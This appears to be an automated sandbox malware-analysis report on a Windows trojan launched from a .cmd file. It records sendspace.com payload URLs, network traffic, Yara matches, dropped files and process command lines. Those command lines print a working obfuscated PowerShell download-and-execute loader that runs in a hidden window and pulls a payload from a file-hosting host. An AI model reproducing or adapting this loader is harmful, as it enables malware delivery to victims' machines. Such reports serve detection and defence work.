Source: powershell.exe, 00000002.00000002.2443831319.000001CB1DDBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sendspace.com
Source: powershell.exe, 00000002.00000002.2443831319.000001CB1C011000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.2256558573.00000000046F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000005.00000002.2261205376.0000000005897000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2261205376.0000000005897000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2261205376.0000000005897000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2443831319.000001CB1DDE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fs12n5.sendspaX
Source: powershell.exe, 00000002.00000002.2443831319.000001CB1DDE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2443831319.000001CB1C4A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fs12n5.sendspace.com
Source: powershell.exe, 00000002.00000002.2443831319.000001CB1C4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2443831319.000001CB1DDBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2443831319.000001CB1DDE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2443831319.000001CB1DDE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2443831319.000001CB1C4A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fs12n5.sendspace.com/dlpro/49f996627c0399c13e97a7cb372f855b/664f94d2/uq21t8/Blokadens.msi
Source: wab.exe, 0000000A.00000003.2232376663.00000000080E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fs13n2.sendspace.com/
Source: wab.exe, 0000000A.00000002.2744457018.00000000080E8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2239862529.00000000080E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fs13n2.sendspace.com/Vn
Source: wab.exe, 0000000A.00000003.2232376663.00000000080E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fs13n2.sendspace.com/dlpro/15f7659e72d924eaa8d6602ae7a3a179/664f950b/6v0noo/nNznaMdneHnj42.b
Source: wab.exe, 0000000A.00000003.2232376663.00000000080E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fs13n2.sendspace.com/om:443
Source: powershell.exe, 00000005.00000002.2256558573.000000000484C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2443831319.000001CB1D471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2600669071.000001CB2C082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2261205376.000000000575A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2261205376.0000000005897000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.2443831319.000001CB1C23D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2443831319.000001CB1D954000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com
Source: wab.exe, 0000000A.00000002.2744457018.0000000008078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/
Source: wab.exe, 0000000A.00000002.2744948578.0000000008220000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2744457018.00000000080B7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2232376663.00000000080E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/pro/dl/6v0noo
Source: wab.exe, 0000000A.00000002.2744457018.00000000080B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/pro/dl/6v0noo)
Source: wab.exe, 0000000A.00000003.2232376663.00000000080E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/pro/dl/6v0nooBc
Source: powershell.exe, 00000002.00000002.2443831319.000001CB1C23D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/pro/dl/uq21t8P
Source: powershell.exe, 00000005.00000002.2256558573.000000000484C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/pro/dl/uq21t8XR
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 50720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50720
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50719
Source: unknown Network traffic detected: HTTP traffic on port 50719 -> 443
Source: unknown HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 69.31.136.53:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.4:50719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.4:50720 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: amsi32_7236.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7152, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7236, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Very long command line found
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 6468
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6492
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 6468 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6492 Jump to behavior
Creates files inside the system directory
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Windows\svchost.com Jump to behavior
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B88AB16 2_2_00007FFD9B88AB16
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B88B8C2 2_2_00007FFD9B88B8C2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B954049 2_2_00007FFD9B954049
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02AAE928 5_2_02AAE928
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02AAF1F8 5_2_02AAF1F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02AAE5E0 5_2_02AAE5E0
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\AutoIt3\Au3Check.exe 07FB7F6D9498BAE332E45617ACEA5CECB4186218AA8F1EB934AB2D48BA8FEB05
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\AutoIt3\Au3Info.exe 6805AA9ADE6C02506EE0E7E4DB52927B8336BC13FA3C10D9B4525B7297A61676
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe 4EC88EB380899460D7DF0DFC23E52CD4320306AAA2954AB78B1A5EF0CA3BD77C
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe 2B94D13DCF7D675C9A74E92FAC2B31C4DF2F392ACE777A94C89D431979E52A89
PE file contains executable resources (Code or Archives)
Source: MicrosoftEdgeUpdateSetup.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: MicrosoftEdgeUpdateSetup.exe.10.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: MicrosoftEdgeUpdateSetup.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: MicrosoftEdgeUpdateSetup.exe.10.dr Static PE information: Resource name: RT_GROUP_ICON type: COM executable for DOS
Source: msoadfsb.exe.10.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: msoasb.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (block device driver\262B)
Source: msoasb.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: AppVDllSurrogate.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: AppVDllSurrogate32.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: OcPubMgr.exe.10.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: OcPubMgr.exe.10.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: OcPubMgr.exe.10.dr Static PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
Source: OcPubMgr.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: OcPubMgr.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: OcPubMgr.exe.10.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: AppVDllSurrogate64.exe.10.dr Static PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
Source: AppVLP.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: Integrator.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: officeappguardwin32.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: officeappguardwin32.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: OfficeScrSanBroker.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: OfficeScrSanBroker.exe.10.dr Static PE information: Resource name: RT_ICON type: 68k Blit mpx/mux executable
Source: OfficeScrSanBroker.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: OfficeScrSanBroker.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: PerfBoost.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: PerfBoost.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: MpCmdRun.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: MpDlpCmd.exe.10.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: UcMapi.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: UcMapi.exe.10.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: UcMapi.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (block device driver p\327G\200<)
Source: VC_redist.x64.exe.10.dr Static PE information: Resource name: RT_ICON type: VAX-order 68K Blit (standalone) executable
Source: integrator.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: Au3Check.exe.10.dr Static PE information: Resource name: RT_GROUP_ICON type: DOS executable (COM, 0x8C-variant)
Source: Aut2exe.exe.10.dr Static PE information: Resource name: RT_ICON type: 370 XA sysV executable not stripped - version 6657 - 5.2 format
Source: Aut2exe_x64.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: ai.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: ai.exe.10.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: ai.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: ai.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: ai.exe0.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (block device driver \240\357E)
Source: upx.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: SciTE.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: Uninstall.exe.10.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: AdobeARMHelper.exe.10.dr Static PE information: Resource name: RT_ICON type: PDP-11 pure executable - version 69
Source: AdobeARMHelper.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: AdobeARMHelper.exe.10.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: jaureg.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: jucheck.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: jucheck.exe.10.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: jusched.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: jusched.exe.10.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: OLicenseHeartbeat.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: grv_icons.exe.10.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: java.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: javaw.exe.10.dr Static PE information: Resource name: RT_ICON type: DitPack archive data
PE file contains strange resources
Source: misc.exe.10.dr Static PE information: Resource name: RT_ICON type: MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "\353\377"
Source: misc.exe.10.dr Static PE information: Resource name: RT_ICON type: MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "\353\377"
Source: OcPubMgr.exe.10.dr Static PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
Source: AppVDllSurrogate64.exe.10.dr Static PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
Source: PerfBoost.exe.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCmdRun.exe0.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
PE file overlay found
Source: armsvc.exe.10.dr Static PE information: Data appended to the last section found
Source: AppVDllSurrogate.exe.10.dr Static PE information: Data appended to the last section found
Source: Au3Check.exe.10.dr Static PE information: Data appended to the last section found
Source: javaw.exe.10.dr Static PE information: Data appended to the last section found
Source: Au3Info_x64.exe.10.dr Static PE information: Data appended to the last section found
Source: MicrosoftEdgeUpdateOnDemand.exe.10.dr Static PE information: Data appended to the last section found
Source: AutoIt3Help.exe.10.dr Static PE information: Data appended to the last section found
Source: aimgr.exe0.10.dr Static PE information: Data appended to the last section found
Source: AppSharingHookController.exe.10.dr Static PE information: Data appended to the last section found
Source: Microsoft.Mashup.Container.Loader.exe.10.dr Static PE information: Data appended to the last section found
Source: MpDlpCmd.exe.10.dr Static PE information: Data appended to the last section found
Source: dbcicons.exe.10.dr Static PE information: Data appended to the last section found
Source: Uninstall.exe.10.dr Static PE information: Data appended to the last section found
Source: chrome.exe.10.dr Static PE information: Data appended to the last section found
Source: ConfigSecurityPolicy.exe.10.dr Static PE information: Data appended to the last section found
Source: MpCopyAccelerator.exe.10.dr Static PE information: Data appended to the last section found
Source: Au3Info.exe.10.dr Static PE information: Data appended to the last section found
Source: SQLDumper.exe.10.dr Static PE information: Data appended to the last section found
Source: Wordconv.exe.10.dr Static PE information: Data appended to the last section found
Source: msoasb.exe.10.dr Static PE information: Data appended to the last section found
Source: AppSharingHookController64.exe.10.dr Static PE information: Data appended to the last section found
Source: AppVLP.exe.10.dr Static PE information: Data appended to the last section found
Source: grv_icons.exe.10.dr Static PE information: Data appended to the last section found
Source: AdobeARMHelper.exe.10.dr Static PE information: Data appended to the last section found
Source: SDXHelper.exe.10.dr Static PE information: Data appended to the last section found
Source: msoev.exe.10.dr Static PE information: Data appended to the last section found
Source: upx.exe.10.dr Static PE information: Data appended to the last section found
Source: MsMpEng.exe.10.dr Static PE information: Data appended to the last section found
Source: AppVDllSurrogate64.exe.10.dr Static PE information: Data appended to the last section found
Source: PerfBoost.exe.10.dr Static PE information: Data appended to the last section found
Source: AppVDllSurrogate32.exe.10.dr Static PE information: Data appended to the last section found
Source: aimgr.exe.10.dr Static PE information: Data appended to the last section found
Source: java.exe.10.dr Static PE information: Data appended to the last section found
Source: VSTOInstaller.exe.10.dr Static PE information: Data appended to the last section found
Yara signature match
Source: amsi32_7236.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7152, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7236, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: MicrosoftEdgeUpdateSetup.exe.10.dr Static PE information: Section: .reloc ZLIB complexity 1.0107421875
Source: VC_redist.x64.exe.10.dr Static PE information: Section: .reloc ZLIB complexity 1.0107421875
Source: classification engine Classification label: mal100.spre.troj.evad.winCMD@14/164@3/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Bridgewards.Hal Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5888:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1236:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cefbqc1w.cfa.ps1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7152
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7236
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\kam.cmd" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Elektroencefalograms = 1;$Unvacuously='Sub';$Unvacuously+='strin';$Unvacuously+='g';Function Afvarslingerne($corrodentia){$Skrivepapiret=$corrodentia.Length-$Elektroencefalograms;For($Parliaments178=5;$Parliaments178 -lt $Skrivepapiret;$Parliaments178+=6){$Mellemvejs+=$corrodentia.$Unvacuously.Invoke( $Parliaments178, $Elektroencefalograms);}$Mellemvejs;}function Delhed($Jambos){. ($Syresaltet254) ($Jambos);}$Fertilizing=Afvarslingerne 'KodifM BundoGangszAffeciM.gnel KvinlBeboeaI ter/Cata 5M,del.Uddat0.orur Wi.d(TilbaW,eganiDa sonDeprid Bag,o,aubewThermsTildm EkspaN AldeT Mim. pejls1Kopi.0Mmesl. Dia.0 ubb;Sl,mb Fami.WSprogiKurvenV,sos6Rema 4Entsv; onse Tarahx Bo.u6Kaval4 A,ls; tomk Cig.rr appev Satd:Anthr1Udmal2.ipho1Mis,a. Sed.0Sedat),uder Prov.Gdemile StercKopibkOversoU ykk/ F gh2Gutta0 Samm1Fl nc0Grund0skovs1nikke0Srpr,1Rubri Hov.dFParahiRimelr CamoedottofUlceroStrudxKreop/N.rco1Okap,2Klyng1Refrn.U,elv0Amula ';$Deniably=Afvarslingerne 'S.zinUPraissKittee,azumrUnder-WittyASadd,gNick eHyposnF,nget C nd ';$Generaene=Afvarslingerne 'Ra,cehmanubtConvatRainwpStddmsHenre:Garro/kn.ge/kerbew HabiwAcylawV.rso.Colons HumbeRebelnKonsodMungcsTranspSten,aBoaercChomse R in.CreencDi,tooB.ctemmili./ IntrpAdaylrpot.co Dip,/ enlsdVandclCopyi/OvertuHyn.eqBruti2phasc1EndostEmbry8Dokst ';$Barks=Afvarslingerne ' Lini>Kalku ';$Syresaltet254=Afvarslingerne 'SkoldiNeshleN.umexKla p ';$Stereomusik='Goldede';$Tohaandsbetjening = Afvarslingerne 'Klu peRv.dicrejsehMultio Pr,e samme% Ennoa ennepFr.udpPlanedHor eaMooratWhinnaZyzzy%Bge,g\Val dBt.ftsrRegi,iGrkerdRevolgUds.uePaschwArcosaCh orrInstrd Rej s Opin.SpotlHunbrua SegmlWarmu Sylle&Klosr&Trinu Fng.eHalfscBaterhCentro nfre BunsetKono, ';Delhed (Afvarslingerne 'An ui$ Sjl.gTil.vlC.oiroGelo,b linda IsaclTeleu:RetsvMPrvkebKnyeneBededlPulv,fOttomaSan,ob Halsrkasini ,ermkledsaaLe.bonPredetdaa.y=Ottin(regracRaggemTragadSni,f Dioe/P onec uth Kono$IndehTAfsvaoPterihDechiaVantaaCopian,malgd A stsBaut,bSh,rteBooketrgre,jAfdeleraspenaktiviMetabnLizarg cal )Sagog ');Delhed (Afvarslingerne 'T,ang$IsvafgOptimlForlao eetsb.uperaMellelIntro:Gal eU ReobnS.edemNavleoUnconn,aabeo,kadepMask ophilalitlliiAd erzNonnei Maninunmo,g Quil=afske$S vsnGShutte Pretn ileeUn apr Cumaa SpageI,ettnKandieKan,i.heptasMisrepVe,trl DagtiOxalatPho o( Road$ SaltBZoodeaTeutorSatsek TabusUnhos) Nond ');$Generaene=$Unmonopolizing[0];$Lommen= (Afvarslingerne ' arti$ Pre.g Lystl Sp,doDime,b SpilaGlatblcys,o:FamilGBaksglkate uSuantmMisreeHomotlI,proiVandlk HenpeTapet=To efNWinkeeSpearwStolt-DyresO stenbGadedjSogneeCamemcMounttDek t RibstSMineryUn.ros Showtbassee VirgmFili,. NonpNIndp eE,strt Impe.slap.WH.ldeeTreckbSti,lCly kelNykalinona,eRosennBangst');$Lommen+=$Mbelfabrikant[1];Delhed ($Lommen);Delhed (Afvarslingerne ',verc$A,rhuG,affllalpinuHannem ind,eskattlJustii DatakB,rfoeCorus.Stin.HHage eCassiaJointd nitheklunsr UnmesSkand[ Over$Ar.ehDSkr.de Job nAb.m
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bridgewards.Hal && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Elektroencefalograms = 1;$Unvacuously='Sub';$Unvacuously+='strin';$Unvacuously+='g';Function Afvarslingerne($corrodentia){$Skrivepapiret=$corrodentia.Length-$Elektroencefalograms;For($Parliaments178=5;$Parliaments178 -lt $Skrivepapiret;$Parliaments178+=6){$Mellemvejs+=$corrodentia.$Unvacuously.Invoke( $Parliaments178, $Elektroencefalograms);}$Mellemvejs;}function Delhed($Jambos){. ($Syresaltet254) ($Jambos);}$Fertilizing=Afvarslingerne 'KodifM BundoGangszAffeciM.gnel KvinlBeboeaI ter/Cata 5M,del.Uddat0.orur Wi.d(TilbaW,eganiDa sonDeprid Bag,o,aubewThermsTildm EkspaN AldeT Mim. pejls1Kopi.0Mmesl. Dia.0 ubb;Sl,mb Fami.WSprogiKurvenV,sos6Rema 4Entsv; onse Tarahx Bo.u6Kaval4 A,ls; tomk Cig.rr appev Satd:Anthr1Udmal2.ipho1Mis,a. Sed.0Sedat),uder Prov.Gdemile StercKopibkOversoU ykk/ F gh2Gutta0 Samm1Fl nc0Grund0skovs1nikke0Srpr,1Rubri Hov.dFParahiRimelr CamoedottofUlceroStrudxKreop/N.rco1Okap,2Klyng1Refrn.U,elv0Amula ';$Deniably=Afvarslingerne 'S.zinUPraissKittee,azumrUnder-WittyASadd,gNick eHyposnF,nget C nd ';$Generaene=Afvarslingerne 'Ra,cehmanubtConvatRainwpStddmsHenre:Garro/kn.ge/kerbew HabiwAcylawV.rso.Colons HumbeRebelnKonsodMungcsTranspSten,aBoaercChomse R in.CreencDi,tooB.ctemmili./ IntrpAdaylrpot.co Dip,/ enlsdVandclCopyi/OvertuHyn.eqBruti2phasc1EndostEmbry8Dokst ';$Barks=Afvarslingerne ' Lini>Kalku ';$Syresaltet254=Afvarslingerne 'SkoldiNeshleN.umexKla p ';$Stereomusik='Goldede';$Tohaandsbetjening = Afvarslingerne 'Klu peRv.dicrejsehMultio Pr,e samme% Ennoa ennepFr.udpPlanedHor eaMooratWhinnaZyzzy%Bge,g\Val dBt.ftsrRegi,iGrkerdRevolgUds.uePaschwArcosaCh orrInstrd Rej s Opin.SpotlHunbrua SegmlWarmu Sylle&Klosr&Trinu Fng.eHalfscBaterhCentro nfre BunsetKono, ';Delhed (Afvarslingerne 'An ui$ Sjl.gTil.vlC.oiroGelo,b linda IsaclTeleu:RetsvMPrvkebKnyeneBededlPulv,fOttomaSan,ob Halsrkasini ,ermkledsaaLe.bonPredetdaa.y=Ottin(regracRaggemTragadSni,f Dioe/P onec uth Kono$IndehTAfsvaoPterihDechiaVantaaCopian,malgd A stsBaut,bSh,rteBooketrgre,jAfdeleraspenaktiviMetabnLizarg cal )Sagog ');Delhed (Afvarslingerne 'T,ang$IsvafgOptimlForlao eetsb.uperaMellelIntro:Gal eU ReobnS.edemNavleoUnconn,aabeo,kadepMask ophilalitlliiAd erzNonnei Maninunmo,g Quil=afske$S vsnGShutte Pretn ileeUn apr Cumaa SpageI,ettnKandieKan,i.heptasMisrepVe,trl DagtiOxalatPho o( Road$ SaltBZoodeaTeutorSatsek TabusUnhos) Nond ');$Generaene=$Unmonopolizing[0];$Lommen= (Afvarslingerne ' arti$ Pre.g Lystl Sp,doDime,b SpilaGlatblcys,o:FamilGBaksglkate uSuantmMisreeHomotlI,proiVandlk HenpeTapet=To efNWinkeeSpearwStolt-DyresO stenbGadedjSogneeCamemcMounttDek t RibstSMineryUn.ros Showtbassee VirgmFili,. NonpNIndp eE,strt Impe.slap.WH.ldeeTreckbSti,lCly kelNykalinona,eRosennBangst');$Lommen+=$Mbelfabrikant[1];Delhed ($Lommen);Delhed (Afvarslingerne ',verc$A,rhuG,affllalpinuHannem ind,eskattlJustii DatakB,rfoeCorus.Stin.HHage eCassiaJointd nitheklunsr UnmesSkand[ Ove
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bridgewards.Hal && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Elektroencefalograms = 1;$Unvacuously='Sub';$Unvacuously+='strin';$Unvacuously+='g';Function Afvarslingerne($corrodentia){$Skrivepapiret=$corrodentia.Length-$Elektroencefalograms;For($Parliaments178=5;$Parliaments178 -lt $Skrivepapiret;$Parliaments178+=6){$Mellemvejs+=$corrodentia.$Unvacuously.Invoke( $Parliaments178, $Elektroencefalograms);}$Mellemvejs;}function Delhed($Jambos){. ($Syresaltet254) ($Jambos);}$Fertilizing=Afvarslingerne 'KodifM BundoGangszAffeciM.gnel KvinlBeboeaI ter/Cata 5M,del.Uddat0.orur Wi.d(TilbaW,eganiDa sonDeprid Bag,o,aubewThermsTildm EkspaN AldeT Mim. pejls1Kopi.0Mmesl. Dia.0 ubb;Sl,mb Fami.WSprogiKurvenV,sos6Rema 4Entsv; onse Tarahx Bo.u6Kaval4 A,ls; tomk Cig.rr appev Satd:Anthr1Udmal2.ipho1Mis,a. Sed.0Sedat),uder Prov.Gdemile StercKopibkOversoU ykk/ F gh2Gutta0 Samm1Fl nc0Grund0skovs1nikke0Srpr,1Rubri Hov.dFParahiRimelr 